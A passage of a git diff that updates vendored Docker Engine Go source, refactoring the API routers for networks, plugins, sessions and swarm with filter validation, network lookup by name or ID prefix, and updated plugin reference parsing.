+				t.Fatalf("expect '%d' networks, got '%d' networks", testCase.resultCount, len(result))
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/network/network.go b/vendor/github.com/docker/docker/api/server/router/network/network.go
index 08a5c8c6a6..4eee970793 100644
--- a/vendor/github.com/docker/docker/api/server/router/network/network.go
+++ b/vendor/github.com/docker/docker/api/server/router/network/network.go
@@ -1,22 +1,21 @@
-package network
+package network // import "github.com/docker/docker/api/server/router/network"
 
 import (
 	"github.com/docker/docker/api/server/router"
-	"github.com/docker/docker/daemon/cluster"
 )
 
 // networkRouter is a router to talk with the network controller
 type networkRouter struct {
-	backend         Backend
-	clusterProvider *cluster.Cluster
-	routes          []router.Route
+	backend Backend
+	cluster ClusterBackend
+	routes  []router.Route
 }
 
 // NewRouter initializes a new network router
-func NewRouter(b Backend, c *cluster.Cluster) router.Router {
+func NewRouter(b Backend, c ClusterBackend) router.Router {
 	r := &networkRouter{
-		backend:         b,
-		clusterProvider: c,
+		backend: b,
+		cluster: c,
 	}
 	r.initRoutes()
 	return r
@@ -37,7 +36,7 @@ func (r *networkRouter) initRoutes() {
 		router.NewPostRoute("/networks/create", r.postNetworkCreate),
 		router.NewPostRoute("/networks/{id:.*}/connect", r.postNetworkConnect),
 		router.NewPostRoute("/networks/{id:.*}/disconnect", r.postNetworkDisconnect),
-		router.NewPostRoute("/networks/prune", r.postNetworksPrune),
+		router.NewPostRoute("/networks/prune", r.postNetworksPrune, router.WithCancel),
 		// DELETE
 		router.NewDeleteRoute("/networks/{id:.*}", r.deleteNetwork),
 	}
diff --git a/vendor/github.com/docker/docker/api/server/router/network/network_routes.go b/vendor/github.com/docker/docker/api/server/router/network/network_routes.go
index 7bfc499552..0248662a49 100644
--- a/vendor/github.com/docker/docker/api/server/router/network/network_routes.go
+++ b/vendor/github.com/docker/docker/api/server/router/network/network_routes.go
@@ -1,17 +1,34 @@
-package network
+package network // import "github.com/docker/docker/api/server/router/network"
 
 import (
+	"context"
 	"encoding/json"
 	"net/http"
-
-	"golang.org/x/net/context"
+	"strconv"
+	"strings"
 
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/libnetwork"
+	netconst "github.com/docker/libnetwork/datastore"
 	"github.com/docker/libnetwork/networkdb"
+	"github.com/pkg/errors"
+)
+
+var (
+	// acceptedNetworkFilters is a list of acceptable filters
+	acceptedNetworkFilters = map[string]bool{
+		"driver": true,
+		"type":   true,
+		"name":   true,
+		"id":     true,
+		"label":  true,
+		"scope":  true,
+	}
 )
 
 func (n *networkRouter) getNetworksList(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
@@ -20,14 +37,18 @@ func (n *networkRouter) getNetworksList(ctx context.Context, w http.ResponseWrit
 	}
 
 	filter := r.Form.Get("filters")
-	netFilters, err := filters.FromParam(filter)
+	netFilters, err := filters.FromJSON(filter)
 	if err != nil {
 		return err
 	}
 
+	if err := netFilters.Validate(acceptedNetworkFilters); err != nil {
+		return err
+	}
+
 	list := []types.NetworkResource{}
 
-	if nr, err := n.clusterProvider.GetNetworks(); err == nil {
+	if nr, err := n.cluster.GetNetworks(); err == nil {
 		list = append(list, nr...)
 	}
 
@@ -40,7 +61,18 @@ SKIP:
 				continue SKIP
 			}
 		}
-		list = append(list, *n.buildNetworkResource(nw))
+
+		var nr *types.NetworkResource
+		// Versions < 1.28 fetches all the containers attached to a network
+		// in a network list api call. It is a heavy weight operation when
+		// run across all the networks. Starting API version 1.28, this detailed
+		// info is available for network specific GET API (equivalent to inspect)
+		if versions.LessThan(httputils.VersionFromContext(ctx), "1.28") {
+			nr = n.buildDetailedNetworkResources(nw, false)
+		} else {
+			nr = n.buildNetworkResource(nw)
+		}
+		list = append(list, *nr)
 	}
 
 	list, err = filterNetworks(list, netFilters)
@@ -50,19 +82,142 @@ SKIP:
 	return httputils.WriteJSON(w, http.StatusOK, list)
 }
 
+type invalidRequestError struct {
+	cause error
+}
+
+func (e invalidRequestError) Error() string {
+	return e.cause.Error()
+}
+
+func (e invalidRequestError) InvalidParameter() {}
+
+type ambigousResultsError string
+
+func (e ambigousResultsError) Error() string {
+	return "network " + string(e) + " is ambiguous"
+}
+
+func (ambigousResultsError) InvalidParameter() {}
+
+func nameConflict(name string) error {
+	return errdefs.Conflict(libnetwork.NetworkNameError(name))
+}
+
 func (n *networkRouter) getNetwork(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	if err := httputils.ParseForm(r); err != nil {
 		return err
 	}
 
-	nw, err := n.backend.FindNetwork(vars["id"])
-	if err != nil {
-		if nr, err := n.clusterProvider.GetNetwork(vars["id"]); err == nil {
-			return httputils.WriteJSON(w, http.StatusOK, nr)
+	term := vars["id"]
+	var (
+		verbose bool
+		err     error
+	)
+	if v := r.URL.Query().Get("verbose"); v != "" {
+		if verbose, err = strconv.ParseBool(v); err != nil {
+			return errors.Wrapf(invalidRequestError{err}, "invalid value for verbose: %s", v)
+		}
+	}
+	scope := r.URL.Query().Get("scope")
+
+	isMatchingScope := func(scope, term string) bool {
+		if term != "" {
+			return scope == term
+		}
+		return true
+	}
+
+	// In case multiple networks have duplicate names, return error.
+	// TODO (yongtang): should we wrap with version here for backward compatibility?
+
+	// First find based on full ID, return immediately once one is found.
+	// If a network appears both in swarm and local, assume it is in local first
+
+	// For full name and partial ID, save the result first, and process later
+	// in case multiple records was found based on the same term
+	listByFullName := map[string]types.NetworkResource{}
+	listByPartialID := map[string]types.NetworkResource{}
+
+	nw := n.backend.GetNetworks()
+	for _, network := range nw {
+		if network.ID() == term && isMatchingScope(network.Info().Scope(), scope) {
+			return httputils.WriteJSON(w, http.StatusOK, *n.buildDetailedNetworkResources(network, verbose))
+		}
+		if network.Name() == term && isMatchingScope(network.Info().Scope(), scope) {
+			// No need to check the ID collision here as we are still in
+			// local scope and the network ID is unique in this scope.
+			listByFullName[network.ID()] = *n.buildDetailedNetworkResources(network, verbose)
+		}
+		if strings.HasPrefix(network.ID(), term) && isMatchingScope(network.Info().Scope(), scope) {
+			// No need to check the ID collision here as we are still in
+			// local scope and the network ID is unique in this scope.
+			listByPartialID[network.ID()] = *n.buildDetailedNetworkResources(network, verbose)
+		}
+	}
+
+	nwk, err := n.cluster.GetNetwork(term)
+	if err == nil {
+		// If the get network is passed with a specific network ID / partial network ID
+		// or if the get network was passed with a network name and scope as swarm
+		// return the network. Skipped using isMatchingScope because it is true if the scope
+		// is not set which would be case if the client API v1.30
+		if strings.HasPrefix(nwk.ID, term) || (netconst.SwarmScope == scope) {
+			// If we have a previous match "backend", return it, we need verbose when enabled
+			// ex: overlay/partial_ID or name/swarm_scope
+			if nwv, ok := listByPartialID[nwk.ID]; ok {
+				nwk = nwv
+			} else if nwv, ok := listByFullName[nwk.ID]; ok {
+				nwk = nwv
+			}
+			return httputils.WriteJSON(w, http.StatusOK, nwk)
 		}
-		return err
 	}
-	return httputils.WriteJSON(w, http.StatusOK, n.buildNetworkResource(nw))
+
+	nr, _ := n.cluster.GetNetworks()
+	for _, network := range nr {
+		if network.ID == term && isMatchingScope(network.Scope, scope) {
+			return httputils.WriteJSON(w, http.StatusOK, network)
+		}
+		if network.Name == term && isMatchingScope(network.Scope, scope) {
+			// Check the ID collision as we are in swarm scope here, and
+			// the map (of the listByFullName) may have already had a
+			// network with the same ID (from local scope previously)
+			if _, ok := listByFullName[network.ID]; !ok {
+				listByFullName[network.ID] = network
+			}
+		}
+		if strings.HasPrefix(network.ID, term) && isMatchingScope(network.Scope, scope) {
+			// Check the ID collision as we are in swarm scope here, and
+			// the map (of the listByPartialID) may have already had a
+			// network with the same ID (from local scope previously)
+			if _, ok := listByPartialID[network.ID]; !ok {
+				listByPartialID[network.ID] = network
+			}
+		}
+	}
+
+	// Find based on full name, returns true only if no duplicates
+	if len(listByFullName) == 1 {
+		for _, v := range listByFullName {
+			return httputils.WriteJSON(w, http.StatusOK, v)
+		}
+	}
+	if len(listByFullName) > 1 {
+		return errors.Wrapf(ambigousResultsError(term), "%d matches found based on name", len(listByFullName))
+	}
+
+	// Find based on partial ID, returns true only if no duplicates
+	if len(listByPartialID) == 1 {
+		for _, v := range listByPartialID {
+			return httputils.WriteJSON(w, http.StatusOK, v)
+		}
+	}
+	if len(listByPartialID) > 1 {
+		return errors.Wrapf(ambigousResultsError(term), "%d matches found based on ID prefix", len(listByPartialID))
+	}
+
+	return libnetwork.ErrNoSuchNetwork(term)
 }
 
 func (n *networkRouter) postNetworkCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
@@ -80,20 +235,33 @@ func (n *networkRouter) postNetworkCreate(ctx context.Context, w http.ResponseWr
 		return err
 	}
 
-	if nws, err := n.clusterProvider.GetNetworksByName(create.Name); err == nil && len(nws) > 0 {
-		return libnetwork.NetworkNameError(create.Name)
+	if nws, err := n.cluster.GetNetworksByName(create.Name); err == nil && len(nws) > 0 {
+		return nameConflict(create.Name)
 	}
 
 	nw, err := n.backend.CreateNetwork(create)
 	if err != nil {
+		var warning string
+		if _, ok := err.(libnetwork.NetworkNameError); ok {
+			// check if user defined CheckDuplicate, if set true, return err
+			// otherwise prepare a warning message
+			if create.CheckDuplicate {
+				return nameConflict(create.Name)
+			}
+			warning = libnetwork.NetworkNameError(create.Name).Error()
+		}
+
 		if _, ok := err.(libnetwork.ManagerRedirectError); !ok {
 			return err
 		}
-		id, err := n.clusterProvider.CreateNetwork(create)
+		id, err := n.cluster.CreateNetwork(create)
 		if err != nil {
 			return err
 		}
-		nw = &types.NetworkCreateResponse{ID: id}
+		nw = &types.NetworkCreateResponse{
+			ID:      id,
+			Warning: warning,
+		}
 	}
 
 	return httputils.WriteJSON(w, http.StatusCreated, nw)
@@ -113,6 +281,10 @@ func (n *networkRouter) postNetworkConnect(ctx context.Context, w http.ResponseW
 		return err
 	}
 
+	// Unlike other operations, we does not check ambiguity of the name/ID here.
+	// The reason is that, In case of attachable network in swarm scope, the actual local network
+	// may not be available at the time. At the same time, inside daemon `ConnectContainerToNetwork`
+	// does the ambiguity check anyway. Therefore, passing the name to daemon would be enough.
 	return n.backend.ConnectContainerToNetwork(connect.Container, vars["id"], connect.EndpointConfig)
 }
 
@@ -137,15 +309,19 @@ func (n *networkRouter) deleteNetwork(ctx context.Context, w http.ResponseWriter
 	if err := httputils.ParseForm(r); err != nil {
 		return err
 	}
-	if _, err := n.clusterProvider.GetNetwork(vars["id"]); err == nil {
-		if err = n.clusterProvider.RemoveNetwork(vars["id"]); err != nil {
+
+	nw, err := n.findUniqueNetwork(vars["id"])
+	if err != nil {
+		return err
+	}
+	if nw.Scope == "swarm" {
+		if err = n.cluster.RemoveNetwork(nw.ID); err != nil {
+			return err
+		}
+	} else {
+		if err := n.backend.DeleteNetwork(nw.ID); err != nil {
 			return err
 		}
-		w.WriteHeader(http.StatusNoContent)
-		return nil
-	}
-	if err := n.backend.DeleteNetwork(vars["id"]); err != nil {
-		return err
 	}
 	w.WriteHeader(http.StatusNoContent)
 	return nil
@@ -162,27 +338,35 @@ func (n *networkRouter) buildNetworkResource(nw libnetwork.Network) *types.Netwo
 	r.ID = nw.ID()
 	r.Created = info.Created()
 	r.Scope = info.Scope()
-	if n.clusterProvider.IsManager() {
-		if _, err := n.clusterProvider.GetNetwork(nw.ID()); err == nil {
-			r.Scope = "swarm"
-		}
-	} else if info.Dynamic() {
-		r.Scope = "swarm"
-	}
 	r.Driver = nw.Type()
 	r.EnableIPv6 = info.IPv6Enabled()
 	r.Internal = info.Internal()
 	r.Attachable = info.Attachable()
+	r.Ingress = info.Ingress()
 	r.Options = info.DriverOptions()
 	r.Containers = make(map[string]types.EndpointResource)
 	buildIpamResources(r, info)
 	r.Labels = info.Labels()
+	r.ConfigOnly = info.ConfigOnly()
+
+	if cn := info.ConfigFrom(); cn != "" {
+		r.ConfigFrom = network.ConfigReference{Network: cn}
+	}
 
 	peers := info.Peers()
 	if len(peers) != 0 {
 		r.Peers = buildPeerInfoResources(peers)
 	}
 
+	return r
+}
+
+func (n *networkRouter) buildDetailedNetworkResources(nw libnetwork.Network, verbose bool) *types.NetworkResource {
+	if nw == nil {
+		return &types.NetworkResource{}
+	}
+
+	r := n.buildNetworkResource(nw)
 	epl := nw.Endpoints()
 	for _, e := range epl {
 		ei := e.Info()
@@ -198,6 +382,28 @@ func (n *networkRouter) buildNetworkResource(nw libnetwork.Network) *types.Netwo
 
 		r.Containers[key] = buildEndpointResource(tmpID, e.Name(), ei)
 	}
+	if !verbose {
+		return r
+	}
+	services := nw.Info().Services()
+	r.Services = make(map[string]network.ServiceInfo)
+	for name, service := range services {
+		tasks := []network.Task{}
+		for _, t := range service.Tasks {
+			tasks = append(tasks, network.Task{
+				Name:       t.Name,
+				EndpointID: t.EndpointID,
+				EndpointIP: t.EndpointIP,
+				Info:       t.Info,
+			})
+		}
+		r.Services[name] = network.ServiceInfo{
+			VIP:          service.VIP,
+			Ports:        service.Ports,
+			Tasks:        tasks,
+			LocalLBIndex: service.LocalLBIndex,
+		}
+	}
 	return r
 }
 
@@ -238,7 +444,9 @@ func buildIpamResources(r *types.NetworkResource, nwInfo libnetwork.NetworkInfo)
 		for _, ip4Info := range ipv4Info {
 			iData := network.IPAMConfig{}
 			iData.Subnet = ip4Info.IPAMData.Pool.String()
-			iData.Gateway = ip4Info.IPAMData.Gateway.IP.String()
+			if ip4Info.IPAMData.Gateway != nil {
+				iData.Gateway = ip4Info.IPAMData.Gateway.IP.String()
+			}
 			r.IPAM.Config = append(r.IPAM.Config, iData)
 		}
 	}
@@ -300,9 +508,90 @@ func (n *networkRouter) postNetworksPrune(ctx context.Context, w http.ResponseWr
 		return err
 	}
 
-	pruneReport, err := n.backend.NetworksPrune(filters.Args{})
+	pruneFilters, err := filters.FromJSON(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	pruneReport, err := n.backend.NetworksPrune(ctx, pruneFilters)
 	if err != nil {
 		return err
 	}
 	return httputils.WriteJSON(w, http.StatusOK, pruneReport)
 }
+
+// findUniqueNetwork will search network across different scopes (both local and swarm).
+// NOTE: This findUniqueNetwork is different from FindNetwork in the daemon.
+// In case multiple networks have duplicate names, return error.
+// First find based on full ID, return immediately once one is found.
+// If a network appears both in swarm and local, assume it is in local first
+// For full name and partial ID, save the result first, and process later
+// in case multiple records was found based on the same term
+// TODO (yongtang): should we wrap with version here for backward compatibility?
+func (n *networkRouter) findUniqueNetwork(term string) (types.NetworkResource, error) {
+	listByFullName := map[string]types.NetworkResource{}
+	listByPartialID := map[string]types.NetworkResource{}
+
+	nw := n.backend.GetNetworks()
+	for _, network := range nw {
+		if network.ID() == term {
+			return *n.buildDetailedNetworkResources(network, false), nil
+
+		}
+		if network.Name() == term && !network.Info().Ingress() {
+			// No need to check the ID collision here as we are still in
+			// local scope and the network ID is unique in this scope.
+			listByFullName[network.ID()] = *n.buildDetailedNetworkResources(network, false)
+		}
+		if strings.HasPrefix(network.ID(), term) {
+			// No need to check the ID collision here as we are still in
+			// local scope and the network ID is unique in this scope.
+			listByPartialID[network.ID()] = *n.buildDetailedNetworkResources(network, false)
+		}
+	}
+
+	nr, _ := n.cluster.GetNetworks()
+	for _, network := range nr {
+		if network.ID == term {
+			return network, nil
+		}
+		if network.Name == term {
+			// Check the ID collision as we are in swarm scope here, and
+			// the map (of the listByFullName) may have already had a
+			// network with the same ID (from local scope previously)
+			if _, ok := listByFullName[network.ID]; !ok {
+				listByFullName[network.ID] = network
+			}
+		}
+		if strings.HasPrefix(network.ID, term) {
+			// Check the ID collision as we are in swarm scope here, and
+			// the map (of the listByPartialID) may have already had a
+			// network with the same ID (from local scope previously)
+			if _, ok := listByPartialID[network.ID]; !ok {
+				listByPartialID[network.ID] = network
+			}
+		}
+	}
+
+	// Find based on full name, returns true only if no duplicates
+	if len(listByFullName) == 1 {
+		for _, v := range listByFullName {
+			return v, nil
+		}
+	}
+	if len(listByFullName) > 1 {
+		return types.NetworkResource{}, errdefs.InvalidParameter(errors.Errorf("network %s is ambiguous (%d matches found based on name)", term, len(listByFullName)))
+	}
+
+	// Find based on partial ID, returns true only if no duplicates
+	if len(listByPartialID) == 1 {
+		for _, v := range listByPartialID {
+			return v, nil
+		}
+	}
+	if len(listByPartialID) > 1 {
+		return types.NetworkResource{}, errdefs.InvalidParameter(errors.Errorf("network %s is ambiguous (%d matches found based on ID prefix)", term, len(listByPartialID)))
+	}
+
+	return types.NetworkResource{}, errdefs.NotFound(libnetwork.ErrNoSuchNetwork(term))
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/backend.go b/vendor/github.com/docker/docker/api/server/router/plugin/backend.go
index ab006b2256..d885ebb33a 100644
--- a/vendor/github.com/docker/docker/api/server/router/plugin/backend.go
+++ b/vendor/github.com/docker/docker/api/server/router/plugin/backend.go
@@ -1,24 +1,26 @@
-package plugin
+package plugin // import "github.com/docker/docker/api/server/router/plugin"
 
 import (
+	"context"
 	"io"
 	"net/http"
 
+	"github.com/docker/distribution/reference"
 	enginetypes "github.com/docker/docker/api/types"
-	"github.com/docker/docker/reference"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/plugin"
 )
 
 // Backend for Plugin
 type Backend interface {
 	Disable(name string, config *enginetypes.PluginDisableConfig) error
 	Enable(name string, config *enginetypes.PluginEnableConfig) error
-	List() ([]enginetypes.Plugin, error)
+	List(filters.Args) ([]enginetypes.Plugin, error)
 	Inspect(name string) (*enginetypes.Plugin, error)
 	Remove(name string, config *enginetypes.PluginRmConfig) error
 	Set(name string, args []string) error
 	Privileges(ctx context.Context, ref reference.Named, metaHeaders http.Header, authConfig *enginetypes.AuthConfig) (enginetypes.PluginPrivileges, error)
-	Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error
+	Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer, opts ...plugin.CreateOpt) error
 	Push(ctx context.Context, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, outStream io.Writer) error
 	Upgrade(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error
 	CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, options *enginetypes.PluginCreateOptions) error
diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go b/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go
index e4ea9e23bf..7a4f987aa3 100644
--- a/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go
+++ b/vendor/github.com/docker/docker/api/server/router/plugin/plugin.go
@@ -1,4 +1,4 @@
-package plugin
+package plugin // import "github.com/docker/docker/api/server/router/plugin"
 
 import "github.com/docker/docker/api/server/router"
 
@@ -30,9 +30,9 @@ func (r *pluginRouter) initRoutes() {
 		router.NewDeleteRoute("/plugins/{name:.*}", r.removePlugin),
 		router.NewPostRoute("/plugins/{name:.*}/enable", r.enablePlugin), // PATCH?
 		router.NewPostRoute("/plugins/{name:.*}/disable", r.disablePlugin),
-		router.Cancellable(router.NewPostRoute("/plugins/pull", r.pullPlugin)),
-		router.Cancellable(router.NewPostRoute("/plugins/{name:.*}/push", r.pushPlugin)),
-		router.Cancellable(router.NewPostRoute("/plugins/{name:.*}/upgrade", r.upgradePlugin)),
+		router.NewPostRoute("/plugins/pull", r.pullPlugin, router.WithCancel),
+		router.NewPostRoute("/plugins/{name:.*}/push", r.pushPlugin, router.WithCancel),
+		router.NewPostRoute("/plugins/{name:.*}/upgrade", r.upgradePlugin, router.WithCancel),
 		router.NewPostRoute("/plugins/{name:.*}/set", r.setPlugin),
 		router.NewPostRoute("/plugins/create", r.createPlugin),
 	}
diff --git a/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go b/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go
index 693fa95baf..4e816391d1 100644
--- a/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go
+++ b/vendor/github.com/docker/docker/api/server/router/plugin/plugin_routes.go
@@ -1,20 +1,20 @@
-package plugin
+package plugin // import "github.com/docker/docker/api/server/router/plugin"
 
 import (
+	"context"
 	"encoding/base64"
 	"encoding/json"
 	"net/http"
 	"strconv"
 	"strings"
 
-	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/streamformatter"
-	"github.com/docker/docker/reference"
 	"github.com/pkg/errors"
-	"golang.org/x/net/context"
 )
 
 func parseHeaders(headers http.Header) (map[string][]string, *types.AuthConfig) {
@@ -46,39 +46,27 @@ func parseHeaders(headers http.Header) (map[string][]string, *types.AuthConfig)
 // be returned.
 func parseRemoteRef(remote string) (reference.Named, string, error) {
 	// Parse remote reference, supporting remotes with name and tag
-	// NOTE: Using distribution reference to handle references
-	// containing both a name and digest
-	remoteRef, err := distreference.ParseNamed(remote)
+	remoteRef, err := reference.ParseNormalizedNamed(remote)
 	if err != nil {
 		return nil, "", err
 	}
 
-	var tag string
-	if t, ok := remoteRef.(distreference.Tagged); ok {
-		tag = t.Tag()
+	type canonicalWithTag interface {
+		reference.Canonical
+		Tag() string
 	}
 
-	// Convert distribution reference to docker reference
-	// TODO: remove when docker reference changes reconciled upstream
-	ref, err := reference.WithName(remoteRef.Name())
-	if err != nil {
-		return nil, "", err
-	}
-	if d, ok := remoteRef.(distreference.Digested); ok {
-		ref, err = reference.WithDigest(ref, d.Digest())
-		if err != nil {
-			return nil, "", err
-		}
-	} else if tag != "" {
-		ref, err = reference.WithTag(ref, tag)
+	if canonical, ok := remoteRef.(canonicalWithTag); ok {
+		remoteRef, err = reference.WithDigest(reference.TrimNamed(remoteRef), canonical.Digest())
 		if err != nil {
 			return nil, "", err
 		}
-	} else {
-		ref = reference.WithDefaultTag(ref)
+		return remoteRef, canonical.Tag(), nil
 	}
 
-	return ref, tag, nil
+	remoteRef = reference.TagNameOnly(remoteRef)
+
+	return remoteRef, "", nil
 }
 
 func (pr *pluginRouter) getPrivileges(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
@@ -133,7 +121,7 @@ func (pr *pluginRouter) upgradePlugin(ctx context.Context, w http.ResponseWriter
 		if !output.Flushed() {
 			return err
 		}
-		output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err))
+		output.Write(streamformatter.FormatError(err))
 	}
 
 	return nil
@@ -172,7 +160,7 @@ func (pr *pluginRouter) pullPlugin(ctx context.Context, w http.ResponseWriter, r
 		if !output.Flushed() {
 			return err
 		}
-		output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err))
+		output.Write(streamformatter.FormatError(err))
 	}
 
 	return nil
@@ -187,24 +175,24 @@ func getName(ref reference.Named, tag, name string) (string, error) {
 				if err != nil {
 					return "", err
 				}
-				name = nt.String()
+				name = reference.FamiliarString(nt)
 			} else {
-				name = reference.WithDefaultTag(trimmed).String()
+				name = reference.FamiliarString(reference.TagNameOnly(trimmed))
 			}
 		} else {
-			name = ref.String()
+			name = reference.FamiliarString(ref)
 		}
 	} else {
-		localRef, err := reference.ParseNamed(name)
+		localRef, err := reference.ParseNormalizedNamed(name)
 		if err != nil {
 			return "", err
 		}
 		if _, ok := localRef.(reference.Canonical); ok {
 			return "", errors.New("cannot use digest in plugin tag")
 		}
-		if distreference.IsNameOnly(localRef) {
+		if reference.IsNameOnly(localRef) {
 			// TODO: log change in name to out stream
-			name = reference.WithDefaultTag(localRef).String()
+			name = reference.FamiliarString(reference.TagNameOnly(localRef))
 		}
 	}
 	return name, nil
@@ -280,7 +268,7 @@ func (pr *pluginRouter) pushPlugin(ctx context.Context, w http.ResponseWriter, r
 		if !output.Flushed() {
 			return err
 		}
-		output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err))
+		output.Write(streamformatter.FormatError(err))
 	}
 	return nil
 }
@@ -298,7 +286,15 @@ func (pr *pluginRouter) setPlugin(ctx context.Context, w http.ResponseWriter, r
 }
 
 func (pr *pluginRouter) listPlugins(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
-	l, err := pr.backend.List()
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	pluginFilters, err := filters.FromJSON(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+	l, err := pr.backend.List(pluginFilters)
 	if err != nil {
 		return err
 	}
diff --git a/vendor/github.com/docker/docker/api/server/router/router.go b/vendor/github.com/docker/docker/api/server/router/router.go
index 2de25c27ff..e62faed710 100644
--- a/vendor/github.com/docker/docker/api/server/router/router.go
+++ b/vendor/github.com/docker/docker/api/server/router/router.go
@@ -1,4 +1,4 @@
-package router
+package router // import "github.com/docker/docker/api/server/router"
 
 import "github.com/docker/docker/api/server/httputils"
 
diff --git a/vendor/github.com/docker/docker/api/server/router/session/backend.go b/vendor/github.com/docker/docker/api/server/router/session/backend.go
new file mode 100644
index 0000000000..d9b14d480c
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/session/backend.go
@@ -0,0 +1,11 @@
+package session // import "github.com/docker/docker/api/server/router/session"
+
+import (
+	"context"
+	"net/http"
+)
+
+// Backend abstracts an session receiver from an http request.
+type Backend interface {
+	HandleHTTPRequest(ctx context.Context, w http.ResponseWriter, r *http.Request) error
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/session/session.go b/vendor/github.com/docker/docker/api/server/router/session/session.go
new file mode 100644
index 0000000000..de6d63008a
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/session/session.go
@@ -0,0 +1,29 @@
+package session // import "github.com/docker/docker/api/server/router/session"
+
+import "github.com/docker/docker/api/server/router"
+
+// sessionRouter is a router to talk with the session controller
+type sessionRouter struct {
+	backend Backend
+	routes  []router.Route
+}
+
+// NewRouter initializes a new session router
+func NewRouter(b Backend) router.Router {
+	r := &sessionRouter{
+		backend: b,
+	}
+	r.initRoutes()
+	return r
+}
+
+// Routes returns the available routers to the session controller
+func (r *sessionRouter) Routes() []router.Route {
+	return r.routes
+}
+
+func (r *sessionRouter) initRoutes() {
+	r.routes = []router.Route{
+		router.Experimental(router.NewPostRoute("/session", r.startSession)),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/session/session_routes.go b/vendor/github.com/docker/docker/api/server/router/session/session_routes.go
new file mode 100644
index 0000000000..691ac62281
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/session/session_routes.go
@@ -0,0 +1,16 @@
+package session // import "github.com/docker/docker/api/server/router/session"
+
+import (
+	"context"
+	"net/http"
+
+	"github.com/docker/docker/errdefs"
+)
+
+func (sr *sessionRouter) startSession(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	err := sr.backend.HandleHTTPRequest(ctx, w, r)
+	if err != nil {
+		return errdefs.InvalidParameter(err)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/backend.go b/vendor/github.com/docker/docker/api/server/router/swarm/backend.go
index 33840f0d30..d0c7e60fb3 100644
--- a/vendor/github.com/docker/docker/api/server/router/swarm/backend.go
+++ b/vendor/github.com/docker/docker/api/server/router/swarm/backend.go
@@ -1,13 +1,14 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/server/router/swarm"
 
 import (
+	"context"
+
 	basictypes "github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	types "github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
-// Backend abstracts an swarm commands manager.
+// Backend abstracts a swarm manager.
 type Backend interface {
 	Init(req types.InitRequest) (string, error)
 	Join(req types.JoinRequest) error
@@ -16,21 +17,32 @@ type Backend interface {
 	Update(uint64, types.Spec, types.UpdateFlags) error
 	GetUnlockKey() (string, error)
 	UnlockSwarm(req types.UnlockRequest) error
+
 	GetServices(basictypes.ServiceListOptions) ([]types.Service, error)
-	GetService(string) (types.Service, error)
-	CreateService(types.ServiceSpec, string) (*basictypes.ServiceCreateResponse, error)
-	UpdateService(string, uint64, types.ServiceSpec, string, string) (*basictypes.ServiceUpdateResponse, error)
+	GetService(idOrName string, insertDefaults bool) (types.Service, error)
+	CreateService(types.ServiceSpec, string, bool) (*basictypes.ServiceCreateResponse, error)
+	UpdateService(string, uint64, types.ServiceSpec, basictypes.ServiceUpdateOptions, bool) (*basictypes.ServiceUpdateResponse, error)
 	RemoveService(string) error
-	ServiceLogs(context.Context, string, *backend.ContainerLogsConfig, chan struct{}) error
+
+	ServiceLogs(context.Context, *backend.LogSelector, *basictypes.ContainerLogsOptions) (<-chan *backend.LogMessage, error)
+
 	GetNodes(basictypes.NodeListOptions) ([]types.Node, error)
 	GetNode(string) (types.Node, error)
 	UpdateNode(string, uint64, types.NodeSpec) error
 	RemoveNode(string, bool) error
+
 	GetTasks(basictypes.TaskListOptions) ([]types.Task, error)
 	GetTask(string) (types.Task, error)
+
 	GetSecrets(opts basictypes.SecretListOptions) ([]types.Secret, error)
 	CreateSecret(s types.SecretSpec) (string, error)
-	RemoveSecret(id string) error
+	RemoveSecret(idOrName string) error
 	GetSecret(id string) (types.Secret, error)
-	UpdateSecret(id string, version uint64, spec types.SecretSpec) error
+	UpdateSecret(idOrName string, version uint64, spec types.SecretSpec) error
+
